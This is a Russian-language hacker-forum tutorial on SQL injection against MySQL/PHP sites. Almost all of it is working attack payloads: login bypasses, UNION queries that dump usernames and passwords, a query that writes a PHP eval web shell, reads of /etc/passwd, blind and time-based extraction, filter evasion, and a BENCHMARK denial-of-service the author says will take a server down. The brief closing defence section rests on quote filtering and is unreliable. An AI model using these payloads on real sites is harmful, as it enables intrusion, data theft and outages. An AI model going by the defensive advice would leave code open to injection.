Краткое оглавление статьи:
0.INTRO
1.КАК НАЙТИ SQL INJECTION
2.ЧТО И КАК МОЖНО ИЗВЛЕЧЬ ИЗ ЭТОГО ПОЛЕЗНОЕ
3.ЧТО ДЕЛАТЬ ЕСЛИ ОТСУТСТВУЮТ ВЫВОДИМЫЕ ПОЛЯ
4.ЧТО ДЕЛАТЬ ЕСЛИ ЧТО-ТО ФИЛЬТРУЕТСЯ
5.ПОЛЕЗНЫЕ ФУНКЦИИ В MYSQL
6. КАК ЗАЩИТИТЬСЯ ОТ SQL INJECTION

[0.INTRO]

Лазив по интернету в поисках хоть какой то инфы по SQL injection ты наверно часто натыкался на статьи либо очень короткие, либо не понятные, либо освещающие одну тему либо еще что-то которые разумеется тебя не устраивали. Когда то и я насобирал где то статей 10-20 по этой теме чтобы вникнуть во многие тонкости этой уязвимости. И вот вспоминая те времена решил написать полный FAQ по этой теме, чтобы так сказать остальные не мучались. И еще одна просьба. Те кто найдет что я что то пропустил, где то ошибся и тд пожалуйста отпишитесь ниже, трудно все таки, все удержать в голове . Кстати это моя первая статья, пожалуйста не кидайтесь помидорами, и не пинайте ногами.

Не первый день увлекаясь взломом ты наверно знаешь что такое SQL injection если нет то я это статья для тебя. SQL injection дальше просто инъекция это тип атаки при котором взломщиком модифицируется оригинальный запрос к БД таким образом чтобы при выполнении запроса была выведена нужная ему информация из БД.

Для усвоения этой статьи требуется:
а) Наличие мозгов
б) Прямые руки
в) Знания языка SQL

В основном эта статья писалась как для MYSQL+PHP но есть и пара примеров с MSSQL.

Вообще по-моему самый лучший способ обучиться правильной работе с SQL injection это не прочтение этой статьи, а живая практика, например самому написать уязвимый скрипт, или использовать мой приведенный в самом конце.

Кстати советую читать все подряд потому что в каждом пункте есть что то важное для следующего пункта и т.д.

К сожалению статья не укладывается в лимит 20000 символов поэтому разбиваю на несколько постов.

[1. КАК НАЙТИ SQL INJECTION]

Это довольно таки просто. Надо вставлять во все поля, переменные, куки двойную и одинарные кавычки.

1.1 Первый случай

Начнем с вот такого скрипта _http://xxx/news.php?id=1. Предположим что оригинальный запрос к БД выглядит так:

Код:
SELECT * FROM news WHERE id='1';
Теперь мы допишем кавычку в переменную "id", вот так _http://xxx/news.php?id=1' если переменная не фильтруется и включены сообщения об ошибках то вылезет что то наподобие:

mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''

Так как в запросе к БД будет присутствовать лишняя кавычка:

Код:
SELECT * FROM news WHERE id='1'';
Если отчет об ошибках выключен то в данном случае можно определить наличие уязвимости вот так (Также не помешало бы это, что бы не спутать с пунктом 1.4. Как именно описанно в этом же пункте): _http://xxx/news.php?id=1'; -- То есть запрос к БД станет вот таким:

Код:
SELECT * FROM news WHERE id='1'; -- ';
(Для тех кто в танке “--“ это знак начала комментария все после него будет отброшено, еще хочу обратить ваше внимание на то что после него должен быть обязательно пробел(Так написано в документации к MYSQL) и кстати перед ним тоже). Таким образом для MYSQL запрос остается прежним и отобразиться тоже самое что и для _http://xxx/news.php?id=1
Тому что делать с этой уязвимостью посвящен весь пункт 2.

1.2 Второй случай

В SQL есть оператор LIKE. Он служит для сравнения строк. Вот допустим скрипт авторизации при вводе логина и пароля запрашивает БД вот так:

Код:
SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '123';
Даже если этот скрипт фильтрует кавычку то все равно он остается уязвимым для инъекции. Нам нужно вместо пароля просто ввести "%" (Для оператора LIKE символ "%" соответствует любой строке) и тогда запрос станет

Код:
SELECT * FROM users WHERE login LIKE 'Admin' AND pass LIKE '%';
и нас пустят внутрь с логином 'Admin'. В этом случае мы не только нашли SQL injection но и успешно ее использовали.

1.3 Третий случай

Что делать если в том же скрипте авторизации отсутствует проверка на кавычку. Имхо будет как минимум глупо использовать эту иньекцию для вывода какой нибудь информаци. Пускай запрос к БД будет типа:

Код:
SELECT * FROM users WHERE login='Admin' AND pass='123';
К сожалению пароль '123' не подходит  , но мы нашли иньекцию допустим в параметре 'login' и что бы зарегистрироваться под ником 'Admin' нам нужно вписать вместо него что то наподобие этого Admin'; -- то есть часть с проверкой пароля отбрасывается и мы входим под ником 'Admin'.

Код:
SELECT * FROM users WHERE login='Admin'; -- ' AND pass='123';
А теперь что делать если уязвимость в поле 'pass'. Мы вписываем в это поле следующее 123' OR login='Admin'; -- . Запрос станет таким:

Код:
SELECT * FROM users WHERE login='Admin' AND pass='123' OR login='Admin'; --  ';
Что для БД будет совершенно индеинтично такому запросу:

Код:
SELECT * FROM users WHERE (login='Admin' AND pass='123') OR (login='Admin');
И после этих действий мы станем полноправным владельцем акка с логином 'Admin'.

1.4 Четвертый случай

Вернемся к скрипту новостей. Из языка SQL мы должны помнить что числовые параметры не ставятся в кавычки то есть при таком обращении к скрипту _http://xxx/news.php?id=1 запрос к БД выглядит вот так:

Код:
SELECT * FROM news WHERE id=1;
Обнаружить эту иньекцию также можно подстановкой кавычки в параметр 'id' и тогда выпрыгнет такое же сообщение об ошибке:

mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''

Если это сообщение не выпригивает то можно понять что кавычка фильтруется и нужно тогда вписать _http://xxx/news.php?id=1 bla-bla-bla
БД не поймет шо это за бла бла бла и выдаст сообщение об ошибке типа:

mysql_query(): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1 bla-bla-bla'

Если отчет об ошибках выключен тогда проверяем вот так _http://xxx/news.php?id=1; --
Должно отобразиться точно также как и _http://xxx/news.php?id=1

Теперь можно переходить к пункту 2.

[2. ЧТО И КАК МОЖНО ИЗВЛЕЧЬ ИЗ ЭТОГО ПОЛЕЗНОЕ]

Дальше будет рассматриваться только тип уязвимости описанный в пункте 1.1 а переделать под остальные сможете сами это не трудно

2.1 Команда UNION

Для начала самое полезное это команда UNION (кто не знает лезть в гугл )…
Модифицируем обращение к скрипту _http://xxx/news.php?id=1' UNION SELECT 1 -- . Запрос к БД у нас получается вот таким:

Код:
SELECT * FROM news WHERE id='1' UNION SELECT 1 --  ';

2.1.1.1 Подбор количества полей(Способ 1)

Не забывая про то что количества столбцов до UNION и после должны соответствовать наверняка вылезет ошибка (если только в таблице news не одна колонка) наподобие:

mysql_query(): The used SELECT statements have a different number of columns

В данном случае нам нужно подобрать количиство столбцов (что бы их количество до UNION и после соответсвовало). Делаем это так:

_http://xxx/news.php?id=1' UNION SELECT 1, 2 --
Ошибка. «The used SELECT statements have a different number of columns»

_http://xxx/news.php?id=1' UNION SELECT 1,2,3 --
Опять ошибка.
…

_http://xxx/news.php?id=1' UNION SELECT 1,2,3,4,5,6 --
О! Отобразилось точно также как и http://xxx/news.php?id=1
значит количество полей подобрано, то есть их 6 штук…

2.1.1.2 Подбор количества полей(Способ 2)

А этот способ основан на подборе количества полей с помощью GROUP BY. То есть запрос такого типа:

_http://xxx/news.php?id=1' GROUP BY 2 --

Будет отображен без ошибок если количество полей меньше или равно 2.
Делаем запрос такого типа:

_http://xxx/news.php?id=1' GROUP BY 10 --

Упс... Появилась ошибка типа.

mysql_query(): Unknown column '10' in 'group statement'

Значит столбцов меньше чем 10. Делим 10 на 2. И делаем запрос

_http://xxx/news.php?id=1' GROUP BY 5 --

Опа ошибки нет значит количество столбцов больше либо равно 5 но меньше чем 10. Теперь берем среднее значение между 5 и 10 это получается вроде 7. Делаем запрос:

_http://xxx/news.php?id=1' GROUP BY 7 --

Ой опять ошибка...

mysql_query(): Unknown column '7' in 'group statement'

Значит количество больше либо равно 5 но меньше чем 7. Ну и дальше делаем запрос

_http://xxx/news.php?id=1' GROUP BY 6 --

Ошибок нет... Значит число больше либо равно 6 но меньше чем 7. Отсюда следует что искомое число столбцов 6.

2.1.1.3 Подбор количества полей(Способ 3)

Тот же самый принцип что и в пункте 2.1.1.2 только используется функция ORDER BY. И немного меняется текст ошибки если полей больше.

mysql_query(): Unknown column '10' in 'order clause'

2.1.2 Определение выводимых столбцов

Я так думаю что многим из нас точно такая страница как и _http://xxx/news.php?id=1 не устроит. Значит нам нужно сделать так чтобы по первому запросу ничего не выводилось (до UNION). Самое простое это поменять "id" с '1' на '-1' (либо на '9999999')
_http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 -- Теперь у нас кое где в странице должны отобразится какие-нибудь из этих цифр. (Например так как это условно скрипт новости то в «Название новости» будет отображенно допустим 3, «Новость»-4 ну и тд). Теперь чтобы нам получить какую нибудь информацию нам нужно заменять эти цифры в обрщении к скрипту на нужные нам функции. Если цифры не отобразились нигде то остальные подпункты пункта 2.1 можно пропустить.

2.1.3 SIXSS (SQL Injection Cros Site Scripting)

Эта таже XSS только через запрос к базе. Пример:
_http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<script>alert('SIXSS')</script>',5,6 --Ну думаю понять не трудно что 4 в странице заменится на <script>alert(‘SIXSS’)</script> и соответственно получится таже XSS.

2.1.4 Названия столбцов/таблиц

Если ты знаешь названия таблиц и стобцов в БД этот пункт можно пропустить
Если не знаешь… Тут два пути.

2.1.4.1 Названия столбцов/таблиц если есть доступ к INFORMATION_SCHEMA и если версия MYSQL >=5

Таблица INFORMATION_SCHEMA.TABLES содержит информацию о всех таблицах в БД, столбец TABLE_NAME-имена таблиц.
_http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES -- Вот тут может появится проблема. Так как будет выводится только первая строка из ответа БД. Тогда нам нужно воспользоваться LIMIT вот так:

Вывод первой строки:
_http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 1,1 --

Вывод второй строки:
_http://xxx/news.php?id=-1' UNION SELECT 1,2,3,TABLE_NAME ,5,6 FROM INFORMATION_SCHEMA.TABLES LIMIT 2,1 --и т.д.

Ну вот мы и нашли таблицу Users. Только это… кхм… стобцы не знаем… Тогда к нам приходит на помощь таблица INFORMATION_SCHEMA.COLUMNS столбец COLUMN_NAME содержит название столбца в таблице TABLE_NAME. Вот так мы извлекаем названия столбцов

_http://xxx/news.php?id=-1' UNION SELECT 1,2,3, COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=’Users’ LIMIT 1,1 --

_http://xxx/news.php?id=-1' UNION SELECT 1,2,3, COLUMN_NAME,5,6 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='Users' LIMIT 2,1 --
и т.д.

И вот мы нашли поля login, password.

2.1.4.2 Названия столбцов/таблиц если нет доступа к INFORMATION_SCHEMA

Это жопный вариант .Тут в силу вступает обычный брутофорс... Пример:

_http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 FROM Имя_таблицы --

Нужно подбирать Имя_таблицы до тех пор пока не пропадет сообщение об ошибке типа:

mysql_query(): Table 'Имя_таблицы' doesn't exist

Ну ввели мы к своему счастью Users пропало сообщение об ошибке, и страница отобразилась как при _http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 -- что это значит? Это значит то что существет таблица Users и нужно приступить к перебору столбцов.

_http://xxx/news.php?id=-1' UNION SELECT 1,2,3,Имя_столбца,5,6 FROM Users --

Нужно подбирать Имя_столбца до тех пор пока не пропадет сообщение об ошибке типа:

mysql_query():Unknown column 'Имя_столбца'' in 'field list'

Там где пропадает сообщение об ошибке значит такой столбец существует.

И вот таким образом мы узнали что в таблице Users есть столбцы login, password.

2.1.5 Вывод информации

Обращение к скрипту таким образом _http://xxx/news.php?id=-1' UNION SELECT 1,2,login,password,5,6 FROM Users LIMIT 1,1 -- Выводит нам логин и пароль первого юзера из таблицы Users.

2.2 Работа с файлами

2.2.1 Запись в файл

Есть в MYSQL такая интересная функция типа SELECT … INTO OUTFILE позволяющая записывать информацию в файл. Либо такая конструкция SELECT ... INTO DUMPFILE они почти похоже и можно использовать любую.

Пример: _http://xxx/news.php?id=-1' UNION SELECT 1,2,3,4,5,6 INTO OUTFILE '1.txt'; --

Для нее работает несколько ограничений.
Запрещенно перезаписывание файлов
Требуются привилегии типа FILE
(!)Обязательны настоящие кывычки в указании имени файла

А вот что бы нам мешало сделать веб шел? Вот например так:

_http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php'; --

Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php. Врипринципе можно найти еще одну ошибку по отчету которой будет виден путь на сервере или оставить в корне сервера и подцепить его локальным инклудом, но это уже другая тема.

2.2.2 Чтение файлов

Рассмотрим функцию LOAD_FILE

Пример: _http://xxx/news.php?id=-1' UNION SELECT 1,2,LOAD_FILE('etc/passwd'),4,5,6;

Для нее есть также несколько ограничений.
Должен быть указан полный путь к файлу.
Требуются привилегии типа FILE
Файл должен находится на одном и том же сервере
Размер данного файла должен быть меньше указанного в max_allowed_packet
Файл должен быть открыт для чтения юзером из-под которого запущен MYSQL

Если функции не удастся прочитать файл то она возвращает NULL.

2.3 DOS атака на SQL сервер

В большинстве случаев SQL сервер досят из-за того что больше ничего сделать не могут. Типа не получилось узнать таблицы/столбцы, нет прав на это, нет прав на то и т.д. Я честно говоря против этого метода но все таки...

Ближе к делу…
Функция BENCHMARK выполняет одно и тоже действие несколько раз.

Код:
SELECT BENCHMARK(100000,md5(current_time));
То есть здесь эта функция 100000 раз делает md5(current_time) что у меня на компе занимает приблизительно 0.7 секунды... Казалось что здесь такого... А если попробовать вложенный BENCHMARK?

Код:
SELECT BENCHMARK(100000,BENCHMARK(100000,md5(current_time )));
Выполняется очень долго честно говоря я даже не дождался... пришлось делать reset .
Пример Доса в нашем случае:

_http://xxx/news.php?id=-1' UNION SELECT 1, 2, BENCHMARK(100000,BENCHMARK(100000,md5(current_time ))), 4, 5, 6; --

Достаточно раз 100 потыкать F5 и «сервер упадет в беспробудный даун» ))).

[3.ЧТО ДЕЛАТЬ ЕСЛИ ОТСУТСТВУЮТ ВЫВОДИМЫЕ ПОЛЯ.]

3.1 Посимвольный перебор

Этот случай нужен нам если _http://xxx/news.php?id=1 при разных id выдаст нам разные результаты. Например http://xxx/news.php?id=1 будет отлично от _http://xxx/news.php?id=0 если нет, то этот метод бесполезен но дочитать до конца стоит.

Как мы помним запрос к БД у нас выглядит так

Код:
SELECT * FROM news WHERE id='1';
Теперь мы его модифицируем через уязвимый парамтр id до такого запроса (если что то незнакомое то идем в пункт 5 и читаем):

Код:
SELECT * FROM news WHERE id='-1' OR id=IF(ASCII((SELECT USER()))>=254,'1','0') -- ';
Вот так:

_http://xxx/news.php?id=-1' OR id=IF(ASCII((SELECT USER()))>=254,'1','0') --

Что нам это дает? Для начала MYSQL выполняет подзапрос SELECT USER() вставляет его в функцию ASCII() которая возвращает ascii код первого символа из результата выполнения подзапроса а функция IF() возвращает 1 если этот код больше или равен 100
oсновной запрос становиться таким

Код:
SELECT * FROM news WHERE id='-1' OR id=1
и выполняется точно также как и при обращении к скрипту http://xxx/news.php?id=1 а если код этого числа меньше то основной запрос становиться таким

Код:
SELECT * FROM news WHERE id='-1' OR id=0
и выполняется точно также как и при http://xxx/news.php?id=0 Назовем условно что запрос возвращает 1(да) или 0(нет) соответственно и начнем перебирать.

_http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=100,'1','0')
Ага вернулся 1 значит код первого символа больше или равен 100. Пробуем вот так:

_http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=200,'1','0')
Вернулся 0 значит 100<= код символа <200.

_http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=150,'1','0')
Опять вернулся 0 значит 100<= код символа <150.

_http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=125,'1','0')
И снова вернулся 0 значит 100<= код символа <125.

_http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=113,'1','0')
Вернулся 1 следовательно113<= код символа <125.

_http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=118,'1','0')
Возвращается 0 следовательно113<= код символа <118.

_http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)>=115,'1','0')
113<= код символа <115.

_http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1) =113,'1','0')
Вернулся 0 значит код символа не равен 113.

_http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),1,1)=114,'1','0')
Ура! Вернулся 1 значит код символа равен 114. Переводим в символ и получаем символ "r". Теперь переходим к следующему символу.

_http://xxx/news.php?id=-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()),2,1)>=100,'1','0')

И заново повторяем все предыдущие шаги.

3.2 Посимвольный перебор с помощью BENCHMARK

Что делать если отсутствует выводимые поля и выключены отчеты об ошибках? На помощь нам прийдет функция BENCHMARK. Как было написано выше, эта функция выполняет одно действие несколько раз. Ну и что спросишь ты... А вот что. Вспомним что запрос

Код:
SELECT BENCHMARK(100000,BENCHMARK(100000,md5(NOW())));
выполняется ооочень долго, и на основе задержек (нет, не пугайся не тех задержек, что сейчас подумал) будем посимвольно перебирать какой-нибудь параметр допустим имя юзера под которым мы подключены к БД (его выводит нам функция USER()).

_http://xxx/news.php?id=-1' OR id= IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, BENCHMARK(2999999,MD5(NOW()))) --

Запрос станет таким:

Код:
SELECT * FROM news WHERE id='-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, BENCHMARK(2999999,MD5(NOW()))) --  ';

И теперь по аналогии с предыдущим пунктом мы будем перебирать строку USER(). Только в данном случае вместо 0 функция будет очень долго выполнять этот запрос что и будет нам говорить о том что запрос вернул 0 и соответственно если без каких либо задержек то запрос возвращает 1.

Теперь поговорим о времени задержки. Для того чтобы определить время возврата 0 и 1 нужно сделать предварительно несколько запросов:

_http://xxx/news.php?id=-1' OR id= IF(99>100, 1, BENCHMARK(2999999,MD5(NOW())))

Будет возвращать 0. Нужно засечь время. В зависимости от ширины вашего канала нужно подобрать число 2999999 до той степени чтобы вы могли точно судить была ли задержка или нет по сравнению с

_http://xxx/news.php?id=-1' OR id= IF(101>100, 1, BENCHMARK(2999999,MD5(NOW())))

который вернет 1.

Огромным минусом является то что BENCHMARK-ом мы очень сильно грузим сервак.

ВНИМАНИЕ! В данном случае главное не забывать что после каждого выполнения BENCHMARK-а серверу SQL нужно дать некоторое время отдых. (Чуть больше чем само выполнение BENCMARK-а). В противном случае результаты данного перебора могут быть неверными.

3.3 Посимвольный перебор с помощью отчета об ошибках

Этот пункт написан на основе (только на основе, без перепечаток!) статьи "Новая альтернатива Benchmark'y или эффективный blind SQL-injection" автор Elekt, респект ему.

Данный способ основан на том что вместо возврата 0, выполняется подзапрос который вызывает ошибку и по выводу ошибок можно судить что возвратился 0 а по отсутствию ошибки что возвратился 1. Этот способ нам поможет если отсутствуют выводимые поля но ВКЛЮЧЕН(!) отчет об ошибках.

Код:
SELECT * FROM news WHERE id='-1' OR id=(SELECT 1 UNION SELECT 2)
Как вы думаете что вернет этот запрос? Правильно ошибку так как id сравнивается с подзапросом который возвращает две строки.

mysql_query():Subquery returns more than 1 row

Это была теория. Теперь переходим к запросу с помощью которого мы будем перебирать символы

Код:
SELECT * FROM news WHERE id='-1' OR id=IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1,(SELECT 1 UNION SELECT 2)) --  ';
Как видно из этого запроса если код символа будет больше или равен 100 функция IF() возвращает 1, и никакой тогда ошибки не вылазит, а если функция выполняет подзапрос

Код:
SELECT 1 UNION SELECT 2
который возвращает две строки что при сравнении с id вызывает ошибку и мы понимаем что запрос вернул 0.

Огромным минусом этого способа является то что в логах скапливаются огромные количества ошибок. А огромным плюсом является скорость работы.

3.4 Иньекция после ORDER BY

Почему то у многих сложилось мнение, что это безнадежный случай. Ну что же будем менять это мнение на противоположное. Допустим к БД запрос выглядит вот так:

Код:
SELECT * FROM news ORDER BY $by
ну и как всегда бывает переменная $by не проходит фильтрации, а на странице выводятся несколько строк из БД. Что ж нам требуется получить два запроса, которые бы изменяли каким то образом вывод на страницу, но еще запросы должны быть такими чтобы можно было влиять на результат с помощью допустим подзапросов. Что же такими запросами могут стать
_http://xxx/news.php?by=(id*1)
_http://xxx/news.php?by=(id*-1)
Надеюсь как вы догадались в второй раз выборка пойдет "сверху вниз" относительно первого запроса, понять почему не сложно. Допустим в первый раз вывелось, примим это за истину:

Код:
Первая новость
Вторая новость
Третья новость
А во второй ложь:

Код:
Третья новость
Вторая новость
Первая новость
Ну чтоже запрос для брута имени текущего юзера будет выглядеть так:
_http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),1,1))=11 2,1,-1))
Чтож вывелся обратный порядок новостей => ложь
_http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),1,1))=11 3,1,-1))
Опять ложь
_http://xxx/news.php?by=(id*IF(ASCII(SUBSTRING(USER(),1,1))=11 4,1,-1))
О! Прямой порядок новостей => истина
Переводим код символа 114 в символ r. Переходим к следующему символу и тд.

[4.ЧТО ДЕЛАТЬ ЕСЛИ ЧТО-ТО ФИЛЬТРУЕТСЯ.]

4.1 Фильтруется пробел

Ну для начала вспомним что для SQL конструкция типа /**/ равна пробелу. А также можно перейти к пункту 4.2.

4.2 Фильтруется символ/строка

Есть интересная функция CHAR() которая возвращает по коду символа сам символ.Предположим фильтруется символ... ну пускай будет звездочка (*). Для начала нам нужно узнать код этого символа. В MYSQL есть функция ASCII() возвращает код самого левого символа из переданной ей строке юзается так

Код:
SELECT ASCII('*');
только на уязвимом хосте этого делать смысла нет (Символ '*' фильтруется) это нужно сделать на локалке. Узнаем что код равен 42 и юзаем функцию CHAR() так

Код:
SELECT CHAR(42, 42, 42);
Выведет три звездочки.Еще один способ это использовать 16-ричный код символа. Теперь предположим что фильтруется солово 'login'. В MYSQL есть функция HEX() которая выдает 16-ричный код строки. Юзается так

Код:
SELECT HEX('login');
Выдаст '6C6F67696E' впереди дописываем "0x" (Чтобы SQL понял что имеет дело с 16-ричной кодировкой) и получаем '0x6C6F67696E ' это юзать без CHAR() так

Код:
SELECT 0x6C6F67696E FROM User;
либо с CHAR() так

Код:
SELECT CHAR(0x6C,0x6F,0x67,0x69,0x6E) FROM User;
[5.ПОЛЕЗНЫЕ ФУНКЦИИ В MYSQL]

Надеюсь что за SELECT, INSERT, UPDATE, DELETE, DROP вы знаете, если нет то лезем в эту книжку читать: Большой справочник языку SQL .

----------------------------
USER()-функция выводит логин юзера под которым мы подключены к MYSQL
DATABASE()-функция выводит название БД к которой мы подключены
VERSION()-выводит версию MYSQL
----------------------------
ASCII(str)-возвращает ASCII код первого символа в строке "str"
CHAR(xx1,xx2,...)-возвращает строку состоящую из сомволов ASCII коды которых xx1, xx2 и т.д.
HEX(str)-возвращает 16-ричный эквивалент строки "str".
----------------------------
LENGTH(str)- Возвращает длину строки "str".
SUBSTRING(str,pos[,len]) -Возвращает подстроку длиной len(если не указан то до конца строки "str") символов из строки "str", начиная от позиции pos.
LOCATE(substr,str[,pos]) -Возвращает позицию первого вхождения подстроки "substr" в строку "str" начиная с позиции pos(если не указанно то с начала строки "str"). Если подстрока "substr" в строке "str" отсутствует, возвращается 0.
----------------------------
LOWER(str)-переводит в нижний регистр строку "str"(по-моему только латиницу)
CONCAT(param1,param2,...) -объединение подстрок в одну строку.
CONCAT_WS(sep,param1,param2,...) -объединение подстрок в одну строку c разделителем "sep".
----------------------------
IF(exp,ret1,ret2)-Проверяет условие exp если оно верно (не равно 0) то возвращает строку ret1 а если нет то возвращает строку ret2.
----------------------------
expr BETWEEN min AND max-Если величина выражения expr больше или равна заданному значению min и меньше или равна заданному значению max, то функция BETWEEN возвращает 1, в противном случае - 0.
----------------------------
AES_DECRYPT(AES_ENCRYPT('строка','bla'),'bla') Часто бывают траблы с кодировкой и можно чтобы сильно не заморачиваться используют эту конструкцию.
----------------------------

Теперь о комментариях в Mysql
1) # символ начала комментария в MySQL. Пример:

Код:
SELECT pass,login FROM users #This is comment
что аналогично запросу

Код:
SELECT pass,login FROM users
2) -- еще один вариант комментария в MySQL. Обязателен пробел после этого знака. Пример:

Код:
SELECT pass,login FROM users -- This is comment
3) /* */ аналог комментария СИ в MySQL. Закрывающая часть необязательна. Для MySQL индеинтична пробелу. Примеры:

Код:
SELECT pass,login FROM users /*This is comment
SELECT pass,login/*This is comment*/FROM users
SELECT/**/pass,login/**/FROM/**/users
4) /*!int */ Расширение предыдущего комментария. Все заключенное в данный комментарий будет интерпретироваться как SQL запрос если номер данной версии MySQL равен указанному числу int после восклицательного знака или больше. Пример:

Код:
SELECT pass/*!32302 ,login*/FROM users
Выведет столбец login если версия MySQL равна либо выше 3.23.02

[6. КАК ЗАЩИТИТЬСЯ ОТ SQL INJECTION]

Вы конечно понимаете что именно для этого пункта и писалась вся эта статья. Все пункты и их подпункты были написанны лишь для того что бы понять все серьезнось ситуации, а за использование этих пунктов в целях противоречащих УКРФ автор данной статьи ответственность не несет.

А защитится очень просто. Кстати все три правила относятся к трем способам передачи информации серверу GET, POST, Cookie.

1)САМОЕ ГЛАВНОЕ ФИЛЬТРОВАТЬ КАВЫЧКИ.
-------------------------------
2)Если используется оператор сравнения строк LIKE фильтровать знаки “%” и “_”
-------------------------------
3)Не использовать при сравнении прерменных без кавычек типа SELECT …WHERE id=$id а использовать так SELECT ...WHERE id='$id' и обратиться к пункту 1